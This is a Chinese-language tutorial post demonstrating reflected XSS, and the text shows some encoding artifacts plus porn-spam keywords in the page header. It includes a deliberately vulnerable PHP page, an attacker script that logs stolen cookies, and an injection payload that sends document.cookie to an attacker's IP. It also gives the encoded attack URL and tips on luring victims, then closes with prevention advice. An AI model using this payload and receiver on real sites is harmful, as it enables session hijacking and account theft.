超碰人人人人人,亚洲AV午夜福利精品一区二区,亚洲欧美综合区丁香五月1区,日韩欧美亚洲系列

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

[點晴永久免費OA]XSS跨站腳本攻擊過程最簡單演示

admin
2020年4月8日 16:31 本文熱度 3585

大多數(shù)人對于XSS的原理有一個基本認識,這里不再重復,只給出一個能夠演示其原理的完整樣例。

1 角色分配

  • 有XXS漏洞的網(wǎng)站,IP地址172.16.35.135,PHP為開發(fā)語言
  • 受害訪問者,IP地址172.16.35.220,瀏覽器為IE11
  • 黑客的數(shù)據(jù)接收網(wǎng)站,IP地址172.16.2.192,PHP為開發(fā)語言

2 源碼實例

2.1 漏洞網(wǎng)站

存在漏洞的URL為:http://172.16.35.135/xss_demo.php

<?php

session_start();

?>

<!doctype html>

<html>

    <head>

        <title>XSS demo</title>

    </head>

    <body>

    <form>

    <input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" />

            <input type="submit" value="Submit" />

        </form>

    </body>

</html>

該網(wǎng)頁把用戶通過GET發(fā)送過來的表單數(shù)據(jù),未經(jīng)處理直接寫入返回的html流,這就是XSS漏洞所在。

2.2 黑客接收網(wǎng)站

接收網(wǎng)站的URL為 http://172.16.2.192/xss_hacker.php

<?php

$victim = ''XXS得到的 cookie:''. $_SERVER[''REMOTE_ADDR'']. '':'' .$_GET[''cookie''];

file_put_contents(''xss_victim.txt'', $victim);

把受害用戶的IP地址和訪問漏洞網(wǎng)站時使用的cookie,一起寫入xss_victim.txt文件保存?zhèn)溆谩?/span>

2.3 用戶正常訪問


用戶使用IE11訪問網(wǎng)站?,F(xiàn)在網(wǎng)站一般都采用session+cookie來保存用戶登錄信息,網(wǎng)站通過驗證cookie來確實是否是合法已登錄用戶,所以cookie是用戶的敏感數(shù)據(jù).

3 攻擊過程

3.1 黑客準備攻擊字符串,構造攻擊URL

黑客可以通過各種掃描工具或者人工輸入來找到有XSS漏洞的網(wǎng)站URL,然后精心構造攻擊字符串。對于本例來說構造出來的字符串為:

"/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--

只要把這個字符串作為漏洞網(wǎng)站文本編輯框的表單值輸入提交,就會造成攻擊。手工輸入這個字符串,并提交,瀏覽器地址欄自動生成攻擊URL。如下圖:


此時,用戶訪問漏洞網(wǎng)站的html代碼,被修改成了:

<!doctype html>

<html>

<head>

<title>XSS demo</title>

</head>

<body>

<form>

<input style="width:500px;" type="text" name="address1" value=""/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--" />

<input type="submit" value="Submit" />

</form>

</body>

</html>

明顯看出,這個html回去執(zhí)行一個腳本,這個腳本功能是把用戶的cookie發(fā)送到黑客的接收網(wǎng)站。


最終生成的攻擊URL為:

http://172.16.35.135/xss_demo.php?address1=%22%2F%3E+%3Cscript%3Ewindow.open%28%22http%3A%2F%2F172.16.2.192%2Fxss_hacker.php%3Fcookie%3D%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E%3C%21--

接下來要做的就是,尋找受害人,誘惑其點擊上述URL。

3.2 用戶上當誤點擊攻擊URL

黑客可以采取各種手段,包括發(fā)Email,在各種論壇網(wǎng)站發(fā)布此攻擊URL,如做成如下誘人連接。


屌絲們最喜歡美女了,在好奇心的驅動下,點擊了這個美女圖片。而點擊的后果正是訪問前面的攻擊URL。

3.3 用戶敏感數(shù)據(jù)被發(fā)送到黑客接收網(wǎng)站

受害用戶訪問攻擊URL后,其敏感數(shù)據(jù)自動發(fā)送到黑客的接收網(wǎng)站。接收網(wǎng)站把這些敏感信息保存到文件中,當然現(xiàn)實的情況一定是存入數(shù)據(jù)庫中了。

xss_victim.txt中現(xiàn)在保存了受害者的敏感數(shù)據(jù)。

 XXS得到的 cookie:172.16.35.220:PHPSESSID=4duu55hgci1leee4os6101cl30

注意,默認IE11開啟了XSS篩選器,此時IE會阻止上述簡單攻擊腳本。為模擬攻擊,我們臨時把XSS篩選器禁用。


3.4 黑客利用敏感數(shù)據(jù)做壞事

有了受害用戶的敏感數(shù)據(jù),就可以利用這些數(shù)據(jù)做各種壞事了,比如以受害用戶身份登錄漏洞網(wǎng)站,等等。

4 XSS的預防

XSS的預防可以從多方面著手:

(1)如前面所述,瀏覽器自身可以識別簡單的XSS攻擊字符串,從而阻止簡單的XSS攻擊;

(2)從根本上說,解決辦法是消除網(wǎng)站的XSS漏洞,這就需要網(wǎng)站開發(fā)者運用轉義安全字符等手段,始終把安全放在心上;

(3)對于普通網(wǎng)民,需要注意盡量抵擋誘惑,別去點擊非知名網(wǎng)站的鏈接。


該文章在 2020/4/8 16:31:56 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內大量中小企業(yè)的青睞。
點晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業(yè)務管理,結合碼頭的業(yè)務特點,圍繞調度、堆場作業(yè)而開發(fā)的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點晴WMS倉儲管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved